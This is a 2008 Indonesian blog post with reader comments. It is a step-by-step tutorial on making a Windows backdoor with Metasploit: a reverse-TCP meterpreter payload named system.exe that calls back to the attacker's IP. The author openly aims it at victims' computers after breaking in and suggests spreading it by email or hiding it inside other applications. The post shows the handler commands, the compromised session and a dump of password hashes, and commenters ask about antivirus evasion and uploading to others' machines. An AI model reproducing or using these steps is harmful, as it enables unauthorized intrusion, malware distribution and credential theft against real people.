Creating backdoor and gainning access with metasploit

ehmmm,,,

it;’s a just simple idea.
kemaren habis bobol komputer orang..cuma lupa mau naruh backdoor..habisnya backdoor yang sekarang uda kedetek ama Anti Virus..malas kalo pengen di manpulasi signaturenya..kelamaan..keburu komputer target di matiin..
kalo mati kan susah payah lagi mau di jebol.apalagi OSnya vista..uhmm lumayan capek untuk di exploitasi..

setelah di pikir2,ternyata PAYLOAD yang ada di metasploit bisa di jadiin backdoor..gimana caranya…??simple aja kok..
berikut caranya :
saya akan membuat sebuat backdoor dengan rincian ( cieeeeeeeeeeeeeee)..
1.alamat komputer hacker 172.18.3.188
2.port yang di gunakan 5555
3.payload : windows/meterpreter/reverse_tcp
4.nama backdoor : system.exe
ini dia caranya :

ian:~/framework-3.1 # ./msfpayload windows/meterpreter/reverse_tcp LHOST=172.18.3.188 LPORT=5555 X > system.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 177
Options: LHOST=172.18.3.188,LPORT=5555
ian:~/framework-3.1 #

setelah selesai,kita bisa melihat backdoornya :

ian:~/framework-3.1 # ls -l system.exe
-rw-r–r– 1 root root 11776 Oct 28 11:13 system.exe
ian:~/framework-3.1 #

setelah dibuat,backdoor tadi saya scan pake AV..ternyata gk kedetek..wuihh..keren abis..
kalo uda kan tinggal di upload ke komputer korban,sebarin lewat email,di gabung dengan aplikasi lain misalnya winamp,atau yang lain..

setelah itu tinggal jalanin servernya pake metasploit.server ini digunakan sebagai sarana komunikasi antar komputer target dan komputer hacker tentunya..hihihi..

ian:~/framework-3.1 # ./msfconsole

_ _
_ | | (_)_
____ ____| |_ ____ ___ ____ | | ___ _| |_
| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)
| | | ( (/ /| |_( ( | |___ | | | | ||_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
|_|

=[ msf v3.1-release
+ — –=[ 262 exploits – 117 payloads
+ — –=[ 17 encoders – 6 nops
=[ 46 aux

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.18.3.188
LHOST => 172.18.3.188
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler…

data yang kita masukan pada metasploit harus sama dengan data yang kita buat pada backdoor tadi…
setelah backdoor di eksekusi di komputer korban maka jadinya seperti ini

msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler…
[*] Transmitting intermediate stager for over-sized stage…(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (81931 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (172.18.3.188:5555 -> 172.18.2.151:1707)
msf exploit(handler) >

ahaaaaaaaaaaaaaaaaa..kita dapat sebuah session komunikasi…setelah itu terserah,..tinggal mau di apain aja tuh komputer..

.
[-] Unknown command: session.
msf exploit(handler) > sessions -l

Active sessions
===============

Id Description Tunnel
— ———– ——
1 Meterpreter 172.18.3.188:5555 -> 172.18.2.151:1708

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1…

meterpreter > sysinfo
Computer: SPY
OS : Windows XP (Build 2600, Service Pack 2).
meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

WAN (PPP/SLIP) Interface
Hardware MAC: 00:53:45:00:00:00
IP Address : 172.16.2.28
Netmask : 255.255.255.255

WAN (PPP/SLIP) Interface
Hardware MAC: 00:53:45:00:00:00
IP Address : 172.16.10.207
Netmask : 255.255.255.255

VMware Accelerated AMD PCNet Adapter – Packet Scheduler Miniport
Hardware MAC: 00:0c:29:b3:03:bb
IP Address : 172.18.2.151
Netmask : 255.255.0.0

meterpreter > use priv
Loading extension priv…success.
meterpreter > hashdump
30:1033:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4c52e121068400575adceeb050b3ebac:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:aad3b435b51404eeaad3b435b51404ee:6039a4cb99b008f34f7f30b5e0b6c436:::
master:1003:aad3b435b51404eeaad3b435b51404ee:4c52e121068400575adceeb050b3ebac:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:9eeac12f2f171b37be2d56803e90a117:::

Posted on October 28, 2008, in Hacking & security. Bookmark the permalink. 3 Comments.

  1. TUTORIAL INI HANYA DITUJUKAN UNTUK PERCOBAAN SAJA.TIDAK DI GUNAKAN UNTUK HAL2 YANG MERUSAK.

  2. terima kasih kak sebelumnya, bgini kak Saya sudah Cb untuk melakukan exploit, dan Bnar ,target saya mmpunyai Vuln ms08_067 pada XP2
    tp stlah saya Mlakukan exploit,sllu Gagal atau tuh dkarenakan Kedetek sma AV Na…
    AV Na Kaspersky…
    untuk Melakukan Backdoor sperti yg di atas…
    Kt mlakukan BAckdoor tuh stlah taw sblum kt memilih payload kak..??

    Mohon Bantuan nya Kak…

  3. mas mw nanya cara mengupload backdor ke komputer orng yg kita tau ipnya gmn?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: